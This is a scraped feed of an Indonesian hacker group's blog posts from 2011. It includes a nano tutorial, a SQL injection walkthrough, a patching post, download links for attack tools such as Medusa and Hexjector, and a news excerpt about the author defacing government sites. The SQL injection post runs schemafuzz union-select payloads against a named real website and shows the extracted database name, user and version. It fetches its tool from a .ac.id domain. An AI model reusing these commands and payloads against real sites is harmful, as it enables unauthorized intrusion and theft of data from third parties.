href="http://en.wikipedia.org/wiki/Pico_%28text_editor%29">Pico</a>, editor dari klien email <a href="http://en.wikipedia.org/wiki/Pine_%28e-mail_client%29">Pine</a>. Tujuan nano dikembangkan adalah untuk meniru Pico sebaik mungkin dan mungkin mencakup fungsionalitas tambahan.</p> <p>Nano merupakan perangkat lunak bebas yang dirilis di bawah bendera <a href="http://en.wikipedia.org/wiki/GNU_General_Public_License">GNU General Public License</a> (lisensi GPLv3).</p> 2. Perintah Dasar Nano <ul><li>-Membuka dan menciptakan sebuah file di nano <p># nano namafile</p> <p>contoh:</p> <p># nano latihan</p> <p>Catatan:<br />Anda juga dapat lansung memberikan format ekstensi pada file teks yang dibuat tersebut, seperti latihan.txt atau latihan.odt</p></li><p> </p><li>-Mengedit file di nano</li><p># nano /etc/issue </p><p> </p><li>-Simpan dan Keluar</li><p>Menyimpan file, tekan Ctrl+O (tahan tombol Ctrl lalu tekan O).<br />Keluar dari nano, tekan Ctrl+X. </p><p> </p><li>-Cut dan Paste</li><p>cut sebuah baris, tekan Ctrl+K.<br />paste, tekan Ctrl+U. </p><p> </p><li>-Mencari Teks</li><p>Tekan Ctrl+W, ketikkan string yang ingin Anda cari, kemudian tekan Enter.<br />Tekan Alt+W, untuk mencari kembali string yang sama. </p></ul> <p>3. Penutup</p> <p>Dengan memahami operasi-operasi dasar pada nano tersebut, nantinya rekan-rekan tidak akan bingung lagi jika mengedit atau membuat sebuah file teks di dalam sebuah Command Line Interface.</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1414553783179251788?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/nIsHtRP7uN4qJkhbevAjrhyTYik/0/da"><img src="http://feedads.g.doubleclick.net/~a/nIsHtRP7uN4qJkhbevAjrhyTYik/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/nIsHtRP7uN4qJkhbevAjrhyTYik/1/da"><img src="http://feedads.g.doubleclick.net/~a/nIsHtRP7uN4qJkhbevAjrhyTYik/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/hvbwWBJVUhs" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/perintah-dasar-teks-editor-nano.htmltag:blogger.com,1999:blog-5679666230684006712.post-38986924978052894422011-01-10T19:57:00.005+07:002011-01-10T20:13:56.970+07:002011-01-10T20:13:56.970+07:00<div style="text-align: center;"> <span style="color: rgb(255, 0, 0); font-weight: bold;">S</span><span style="font-weight: bold;">Q</span><span style="color: rgb(255, 0, 0); font-weight: bold;">L</span><span style="font-weight: bold;"> </span><span style="color: rgb(255, 0, 0); font-weight: bold;">I</span><span style="font-weight: bold;">njection </span><span style="color: rgb(255, 0, 0); font-weight: bold;">W</span><span style="font-weight: bold;">ith </span><span style="color: rgb(255, 0, 0); font-weight: bold;">S</span><span style="font-weight: bold;">chemafuzz</span><br />=========================================================<br /> Welcome to my tutorial by arianom KiLL-9 CrEw<br /> Powered by kill-9.tk<br />==================================================================<br /></div><div style="text-align: left;">[+] Pertama Kali yang anda butuhkan untuk hacking dengan schemafuzz adalah sebuah sistem operasi Linux, atau account ssh.<br />Schemafuzz ini dijalankan menggunakan python.<br />1. login ke account ssh kmu atau masuk ke terminal jika menggunakan linux<br />2. wget schemafuzz.py : wget <a href="http://undana.ac.id/images/upload/schemafuzz.py">http://undana.ac.id/images/upload/schemafuzz.py</a><br />3. mv schemafuzz.py f >> untuk memperpendek cmd<br />4. python f -h >> mengetahui option cmd<br /><br />> ketik python f -h<br />Usage: python f [options] arianom[@]gmail[dot]com kill-9.tk<br /> Modes:<br /> Define: --findcol Finds Columns length of a SQLi MySQL v4+<br /> Define: --info Gets MySQL server configuration only. MySQL v4+<br /> Define: --dbs Shows all databases user has access too. MySQL v5+<br /> Define: --schema Enumerate Information_schema Database. MySQL v5+<br /> Define: --full Enumerates all databases information_schema table MySQL v5+<br /> Define: --dump Extract information from a Database, Table and Column. MySQL v4+<br /> Define: --fuzz Fuzz Tables and Columns. MySQL v4+<br /><br /> Required:<br /> Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"<br /><br /> Mode dump and schema options:<br /> Define: -D "database_name"<br /> Define: -T "table_name"<br /> Define: -C "column_name,column_name..."<br /><br /> Optional:<br /> Define: -p "127.0.0.1:80 or proxy.txt"<br /> Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt<br /> Define: -r row number to start at<br /> Define: -v Verbosity off option. Will not display row #'s in dump mode.<br /><br />1. python f --findcol -u "www.site.com/news.php?id=22"<br />2. python f --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"<br />3. python f --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"<br />4. python f --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db<br />5. python f --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db -T user -C name,pass<br />6. python f --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt<br /><br /><br />[x] Penetrasi ke target. oke, kita cari target........<br />target di dapat : http://akperpasuruan.com/index.php?list=berita&amp;de=14<br /><br />1. langkah pertama --findcol [mencari panjang kolom]<br /><br />[root@su110 tmp]# python f --findcol -u "http://akperpasuruan.com/index.php?list=berita&amp;de=14"<br /><br />|---------------------------------------------------------------|<br />| arianom[@]gmail[dot]com v5.0 |<br />| 6/2008 schemafuzz.py |<br />| -MySQL v5+ Information_schema Database Enumeration |<br />| -MySQL v4+ Data Extractor |<br />| -MySQL v4+ Table &amp; Column Fuzzer |<br />| Usage: python f [options] |<br />| -h help kill-9.tk |<br />|---------------------------------------------------------------|<br /><br />[+] URL: http://akperpasuruan.com/index.php?list=berita&amp;de=14--<br />[+] Evasion Used: "+" "--"<br />[+] 16:55:12<br />[-] Proxy Not Given<br />[+] Attempting To find the number of columns...<br />[+] Testing: 0,1,2,3,<br />[+] Column Length is: 4<br />[+] Found null column at column #: 1<br />[+] SQLi URL: http://akperpasuruan.com/index.php?list=berita&amp;de=14+AND+1=2+UNION+SELECT+0,1,2,3--<br />[+] darkc0de URL: http://akperpasuruan.com/index.php?list=berita&amp;de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3<br />[-] Done!<br /><br />2. langkah ke dua --info [melihat database]<br /><br />[root@su110 tmp]# python f --info -u "http://akperpasuruan.com/index.php?list=berita&amp;de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3"<br /><br />|---------------------------------------------------------------|<br />| arianom[@]gmail[dot]com v5.0 |<br />| 6/2008 schemafuzz.py |<br />| -MySQL v5+ Information_schema Database Enumeration |<br />| -MySQL v4+ Data Extractor |<br />| -MySQL v4+ Table &amp; Column Fuzzer |<br />| Usage: python f [options] |<br />| -h help kill-9.tk |<br />|---------------------------------------------------------------|<br /><br />[+] URL: http://akperpasuruan.com/index.php?list=berita&amp;de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3--<br />[+] Evasion Used: "+" "--"<br />[+] 16:56:57<br />[-] Proxy Not Given<br />[+] Gathering MySQL Server Configuration...<br /> Database: akperpas_db<br /> User: akperpas_bagus@localhost<br /> Version: 5.0.91-community<br /><br />[+] Do we have Access to MySQL Database: No<br />[+] Do we have Access to Load_File: No<br /><br />[-] 16:57:23<br />[-] Total URL Requests 3<br />[-] Done<br /><br />Selengkapnya bisa di download <a href="http://akperpasuruan.com/robots.txt"><span style="font-weight: bold;">disini</span></a><br />Request mas <a style="font-weight: bold;" href="mailto:bagoes.bocah@ymail.com" target="_blank"><span class="pn_std">jhony</span></a> utk tutorial schemafuzz<br /></div><br />[x] Greats:<br />All KiLL-9 CrEw and IndonesianCoder Team, DarkCode, MC-CrEW , Magelang-Cyber CrEw, KPLI Kediri, JatimCom, and All Indonesian Hacker and You<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-3898692497805289442?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/9HpK4Ylut5ghkVW226bsd-1La8w/0/da"><img src="http://feedads.g.doubleclick.net/~a/9HpK4Ylut5ghkVW226bsd-1La8w/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/9HpK4Ylut5ghkVW226bsd-1La8w/1/da"><img src="http://feedads.g.doubleclick.net/~a/9HpK4Ylut5ghkVW226bsd-1La8w/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/biihtykXMHs" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/sql-injection-with-schemafuzz.htmltag:blogger.com,1999:blog-5679666230684006712.post-67091167626862658472011-01-07T10:37:00.006+07:002011-01-07T10:54:39.332+07:002011-01-07T10:54:39.332+07:00SQL Injection adalah salah satu teknik penyerangan ke sebuah web dengan cara memasukkan perintah sql ke url target sehingga attacker bisa memperoleh informasi penting dari website tersebut. Seperti nama user, password, email, dan masih banyak lagi informasi yg bisa didapatkan tergantung kreativitas attacker. Langsung saja kita coba scan bug dengan memasukkan sigle quote di akhir url, misalkan : <p class="MsoNormal" style=""><a href="http://site.com/index.php?list=berita&amp;de=14">http://site.com/index.php?list=berita&amp;de=14</a>’</p><p class="MsoNormal" style="">Kalau ada error, bisa dianggap positif vuln terhadap sqli. Lihat gambar dibawah:</p><p class="MsoNormal" style=""><a href="http://1.bp.blogspot.com/_t3RQMzRGaJs/TSaNg4pZfNI/AAAAAAAAAFQ/wXx92VKnhxg/s1600/sql1.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 229px;" src="http://1.bp.blogspot.com/_t3RQMzRGaJs/TSaNg4pZfNI/AAAAAAAAAFQ/wXx92VKnhxg/s320/sql1.jpg" alt="" id="BLOGGER_PHOTO_ID_5559286386136808658" border="0" /></a></p> <p class="MsoNormal">Seperti yang kita ketahui bugnya ada di <a href="http://site.com/index.php?list=berita&amp;de=14">http://site.com/index.php?list=berita&amp;de=14</a> , lebih tepatnya yg menyebabkan ini semua terjadi adalah file <strong><i>berita.php</i></strong> dan string <strong><i>de</i></strong>, sekarang kita coba buka file ini dengan text editor, bisa notepad, wordpad, atau kalau ane sih sukanya pake editplus. Ini isi dari sebagian filenya :</p><p class="MsoNormal"><a href="http://2.bp.blogspot.com/_t3RQMzRGaJs/TSaMkaUAJjI/AAAAAAAAAE4/laupxoAyag0/s1600/sql3.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_t3RQMzRGaJs/TSaMkaUAJjI/AAAAAAAAAE4/laupxoAyag0/s320/sql3.jpg" alt="" id="BLOGGER_PHOTO_ID_5559285347201852978" border="0" /></a><br />Bugnya ada di script bagian ini :</p><span style="color: rgb(51, 51, 255);" >$iddetail = $_GET['de'];</span><p class="MsoNormal" style="">Tidak adanya filter di <strong>$_GET[‘de’] </strong>menyebabkan web ini vulnerable. Oke script penyebab ini semua telah kita temukan, sekarang saatnya patching. Tambahkan script ini diatas script vulnerable diatas :</p><p class="MsoNormal" style=""><a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TSaM77WEZXI/AAAAAAAAAFA/OxnnevTMSqc/s1600/sql4.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 220px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TSaM77WEZXI/AAAAAAAAAFA/OxnnevTMSqc/s320/sql4.jpg" alt="" id="BLOGGER_PHOTO_ID_5559285751205881202" border="0" /></a></p><p class="MsoNormal" style="">Lalu ganti script <b><span style="color:blue;">$iddetail = $_GET['de']</span></b><span style="color:blue;">;</span><strong> </strong>menjadi <strong><span style="color:blue;">$iddetail = $de</span>; </strong>Untuk script lengkapnya bias di download <a href="http://depnakertrans.go.id/uploads/doc/patch-sql.txt">disini</a>. <span style="color:black;">Sekarang coba buka lagi page vulnerable dan tambahkan single quote(‘) dan tarra.. proses patching telah berhasil.</span></p><a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TSaNT5kU8BI/AAAAAAAAAFI/LiCmbg7-qSY/s1600/sql2.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 194px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TSaNT5kU8BI/AAAAAAAAAFI/LiCmbg7-qSY/s320/sql2.jpg" alt="" id="BLOGGER_PHOTO_ID_5559286163045675026" border="0" /></a><p class="MsoNormal" style=""><span style="color:black;"> </span></p> <p class="MsoNormal" style=""><span style="color:black;">Greats :<br /></span></p><p class="MsoNormal" style=""><span style="color:black;">All Kill-9 Crew and IndonesianCoder Team, Malang-Cyber Crew and All Indonesian Hacker and You</span></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6709116762686265847?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/ByCZxyqopgRAf0KKe0GHUVoeqtM/0/da"><img src="http://feedads.g.doubleclick.net/~a/ByCZxyqopgRAf0KKe0GHUVoeqtM/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/ByCZxyqopgRAf0KKe0GHUVoeqtM/1/da"><img src="http://feedads.g.doubleclick.net/~a/ByCZxyqopgRAf0KKe0GHUVoeqtM/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/QWyeCkoMTSw" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/patch-sql-injection.htmltag:blogger.com,1999:blog-5679666230684006712.post-88158957742757271722011-01-04T00:03:00.001+07:002011-01-04T00:06:37.507+07:002011-01-04T00:06:37.507+07:00<div class="post-header"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_p3XIipv981Y/TNbVyXE3vsI/AAAAAAAAAyU/_larYN6LQs4/s1600/screenshot.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img style="width: 200px; height: 126px;" src="http://2.bp.blogspot.com/_p3XIipv981Y/TNbVyXE3vsI/AAAAAAAAAyU/_larYN6LQs4/s200/screenshot.jpg" border="0" /></a></div><div style="text-align: justify;">Hexjector is an Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.</div>Features:<br />1.Check for SQL Injection Vulnerablities.<br />2.Pentest SQL Injection Vulnerablities.<br />3.Web Application Firewall Detector.<br />4.Scan For Admin Page<br /><br />5.Manual Dump Function<br />6.Browser<br />7.SQL Injection Type Detection<br />8.Search For Vulnerable Sites by using Google Dork<br />9.MD5 Cracker<br /><br /><a href="http://91ce5b97.linkbucks.com/">Download</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-8815895774275727172?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/xp0YOslhAWAvr2Ziz7nwBhMld0Q/0/da"><img src="http://feedads.g.doubleclick.net/~a/xp0YOslhAWAvr2Ziz7nwBhMld0Q/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/xp0YOslhAWAvr2Ziz7nwBhMld0Q/1/da"><img src="http://feedads.g.doubleclick.net/~a/xp0YOslhAWAvr2Ziz7nwBhMld0Q/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/VjCqlYwbuaU" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/hexjector.htmltag:blogger.com,1999:blog-5679666230684006712.post-14007165208683951162011-01-04T00:02:00.000+07:002011-01-04T00:18:06.611+07:002011-01-04T00:18:06.611+07:00<div class="post-header"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_p3XIipv981Y/TPbYYfGjZzI/AAAAAAAAAz0/qBmc8oBJmRg/s1600/armitage4-1024x798.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img src="http://2.bp.blogspot.com/_p3XIipv981Y/TPbYYfGjZzI/AAAAAAAAAz0/qBmc8oBJmRg/s200/armitage4-1024x798.png" border="0" width="200" height="155" /></a></div><div style="text-align: justify;">Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Armitage organizes Metasploit’s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">For discovery, Armitage exposes several of Metasploit’s host management features. You can import hosts and launch scans to populate a database of targets. Armitage also visualizes the database of targets–you’ll always know which hosts you’re working with and where you have sessions.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Armitage assists with remote exploitation–providing features to automatically recommend exploits and even run active checks so you know which exploits will work. If these options fail, you can use the Hail Mary approach and unleash db_autopwn against your target database.</div><div style="text-align: justify;"><br /></div>Requirements<br />To use Armitage, you need the following:<br />Linux or Windows<br />Java 1.6+<br />Metasploit Framework 3.5+<br />A configured database. Make sure you know the username, password, and host.<br /><br /><a href="http://0eb29074.linkbucks.com/">Download [Win]</a><br /><a href="http://63fcdbc9.linkbucks.com/">Download [LiN/niX]</a><br /><br /><a href="http://f53603f2.linkbucks.com/">Source</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1400716520868395116?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/KfxrDy7ifhzH40n2c6RtRfPHJQQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/KfxrDy7ifhzH40n2c6RtRfPHJQQ/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/KfxrDy7ifhzH40n2c6RtRfPHJQQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/KfxrDy7ifhzH40n2c6RtRfPHJQQ/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/XWL_WQYHvHw" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/armitage.htmltag:blogger.com,1999:blog-5679666230684006712.post-79521564485663988022011-01-04T00:00:00.000+07:002011-01-04T00:02:43.486+07:002011-01-04T00:02:43.486+07:00<div class="post-header"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_p3XIipv981Y/TNccEs1YoLI/AAAAAAAAAyo/IvWYtUx3tAk/s1600/ddpwnasciiart.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img style="width: 199px; height: 119px;" src="http://1.bp.blogspot.com/_p3XIipv981Y/TNccEs1YoLI/AAAAAAAAAyo/IvWYtUx3tAk/s200/ddpwnasciiart.PNG" border="0" /></a></div><div style="margin-bottom: 0px; margin-top: 0px; text-align: justify;"><span class="Apple-style-span" style="font-family: Times,'Times New Roman',serif;"> It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as Web/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module.<br />It's written in perl programming language and can be run either under *NIX or Windows platforms. Fuzzing modules supported in this version:</span></div><br /><div style="margin-bottom: 0px; margin-top: 0px;" align="justify"><span class="Apple-style-span" style="font-family: Times,'Times New Roman',serif;"> <a href="http://1f940c3f.linkbucks.com">Download</a></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-7952156448566398802?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/EfLqbvzPWqOzHdgB9yAK_2vyZPw/0/da"><img src="http://feedads.g.doubleclick.net/~a/EfLqbvzPWqOzHdgB9yAK_2vyZPw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/EfLqbvzPWqOzHdgB9yAK_2vyZPw/1/da"><img src="http://feedads.g.doubleclick.net/~a/EfLqbvzPWqOzHdgB9yAK_2vyZPw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/JlkS0af6-vo" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/dotdotpwn.htmltag:blogger.com,1999:blog-5679666230684006712.post-83257445270962009022011-01-03T20:12:00.001+07:002011-01-03T21:03:51.141+07:002011-01-03T21:03:51.141+07:00<div class="post-header"> </div> <div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_p3XIipv981Y/TRoJnmu5wzI/AAAAAAAAA1Q/TzZuR8iRjrg/s1600/grub_2.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img src="http://3.bp.blogspot.com/_p3XIipv981Y/TRoJnmu5wzI/AAAAAAAAA1Q/TzZuR8iRjrg/s200/grub_2.png" border="0" width="200" height="150" /></a></div>Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10 and work on reference Back|Track. It's created as a hobby. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><a href="http://a95420d1.linkbucks.com">Source</a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-8325744527096200902?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/HLsSHre3R1rjZ64AhvW5UAOrbaM/0/da"><img src="http://feedads.g.doubleclick.net/~a/HLsSHre3R1rjZ64AhvW5UAOrbaM/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/HLsSHre3R1rjZ64AhvW5UAOrbaM/1/da"><img src="http://feedads.g.doubleclick.net/~a/HLsSHre3R1rjZ64AhvW5UAOrbaM/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/ox80oy_CdMc" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/blackbuntu.htmltag:blogger.com,1999:blog-5679666230684006712.post-9176529256619253072011-01-03T20:10:00.001+07:002011-01-03T21:09:43.499+07:002011-01-03T21:09:43.499+07:00<div class="post-header"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_p3XIipv981Y/TPgxtQ6V6fI/AAAAAAAAAz4/NsyPGVQkH_w/s1600/medusae.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img src="http://4.bp.blogspot.com/_p3XIipv981Y/TPgxtQ6V6fI/AAAAAAAAAz4/NsyPGVQkH_w/s200/medusae.jpg" border="0" width="141" height="200" /></a></div><div style="text-align: justify;">Medusa Parallel Network Login Auditor</div><div style="text-align: justify;">Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application: </div><div style="text-align: justify;">Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently. </div><div style="text-align: justify;">Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing. </div><div style="text-align: justify;">Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><a href="http://80191373.linkbucks.com">Source &amp; Download</a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-917652925661925307?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/Im-5tdw3lae6D-MFPUydBGxmzlw/0/da"><img src="http://feedads.g.doubleclick.net/~a/Im-5tdw3lae6D-MFPUydBGxmzlw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/Im-5tdw3lae6D-MFPUydBGxmzlw/1/da"><img src="http://feedads.g.doubleclick.net/~a/Im-5tdw3lae6D-MFPUydBGxmzlw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/uBa99bhIZDs" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/medusa.htmltag:blogger.com,1999:blog-5679666230684006712.post-13475166869454151182011-01-03T12:17:00.000+07:002011-01-04T00:10:45.173+07:002011-01-04T00:10:45.173+07:00<div class="post-header"> </div> <div face="'Droid Sans','Albany AMT','lucida grande',tahoma,helvetica,arial,sans-serif" size="13px" style="line-height: 16px; text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_p3XIipv981Y/TNcYCuEDauI/AAAAAAAAAyk/iPt7-qnBkEI/s1600/390634588_330f74c9a8.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img src="http://4.bp.blogspot.com/_p3XIipv981Y/TNcYCuEDauI/AAAAAAAAAyk/iPt7-qnBkEI/s200/390634588_330f74c9a8.jpg" border="0" width="200" height="150" /></a></div> Ostinato Live converts any PC to a dedicated network packet traffic generator. It runs the open source cross platform packet traffic generator – Ostinato. <br /></div><div style="font-family: 'Droid Sans','Albany AMT','lucida grande',tahoma,helvetica,arial,sans-serif; font-size: 13px; line-height: 16px; text-align: justify;"> Ostinato is a network packet and traffic generator and analyzer with a friendly <span class="caps">GUI</span>. It aims to be “Wireshark in Reverse” and thus become complementary to Wireshark. It features custom packet crafting with editing of any field for several protocols: Ethernet, 802.3, <span class="caps">LLC</span> <span class="caps">SNAP</span>, <span class="caps">VLAN</span> (with Q-in-Q), <span class="caps">ARP</span>, IPv4, IPv6, IP-in-IP a.k.a IP Tunneling, <span class="caps">TCP</span>, <span class="caps">UDP</span>, <span class="caps">ICMP</span>,<span class="caps">HTTP</span>, <span class="caps">SIP</span>, <span class="caps">RTSP</span>, <span class="caps">NNTP</span>, etc. It is useful for both functional and performance testing.</div><div style="font-family: 'Droid Sans','Albany AMT','lucida grande',tahoma,helvetica,arial,sans-serif; font-size: 13px; line-height: 16px; text-align: justify;"><br /></div><div style="font-family: 'Droid Sans','Albany AMT','lucida grande',tahoma,helvetica,arial,sans-serif; font-size: 13px; line-height: 16px; text-align: justify;"><a href="http://f4049855.linkbucks.com/">Download</a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1347516686945415118?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/ETeLRXrXIVpFER7yDLZnZL-P6u0/0/da"><img src="http://feedads.g.doubleclick.net/~a/ETeLRXrXIVpFER7yDLZnZL-P6u0/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/ETeLRXrXIVpFER7yDLZnZL-P6u0/1/da"><img src="http://feedads.g.doubleclick.net/~a/ETeLRXrXIVpFER7yDLZnZL-P6u0/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/iU-UnSLTpeM" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/ostinato.htmltag:blogger.com,1999:blog-5679666230684006712.post-87858323648943453892011-01-02T17:56:00.000+07:002011-01-29T18:04:41.223+07:002011-01-29T18:04:41.223+07:00<div style="text-align: center;"><img style="width: 446px; height: 229px;" src="http://d.yimg.com/hb/ng/co/kmps/20100816/09/1747197419-71-situs-indonesia-dikerjai-hacker.jpg" alt="" border="0" /><br /></div><br />KOMPAS.com - Menjelang peringatan kemerdekaan ke-65 Republik Indonesia, hacker atau peretas dari Indonesia justru bikin ulah di puluhan situs yang mayoritas milik lembaga resmi di Indonesia. Mereka meninggalkan pesan begini, "DIRGAHAYU INDONESIA TANAH AIR PUSAKA JAYALAH BANGSAKU, JAYALAH NEGERIKU..MERDEKA!!"<br /><br />Aksi itu dimotori peretas yang menyebut diri Aria Killnine a.k.a <a href="http://kill-9.tk">arianom</a>, pendiri komunitas <em>KiLL-9 CrEw </em>dengan situsnya di <a href="http://kill-9.tk"><em>Www.KiLL-9.Tk</em></a>.<br /><br />Daftar situs yang diretas terlihat di bawah nanti. Tetapi, mengapa pula justru menyerang situs milik anak bangsa sendiri?<br /><em><a href="http://teknologi.kompasiana.com/">Kompasianer</a> </em>Rakhjib Martapianur memberitahu, "Mereka tidak melakukan perusakan terhadap site-site tersebut. Mereka hanya menitipkan file, sekaligus mengingatkan para admin site tersebut bahwa site yang mereka kelola rentan terhadap serangan oleh hacker-hacker luar Indonesia."<br /><br />Rakhjib Martapianur mengakui, informasi itu diketahuinya dari temannya yang bergelut di dunia <em>hacking</em>. Dan, 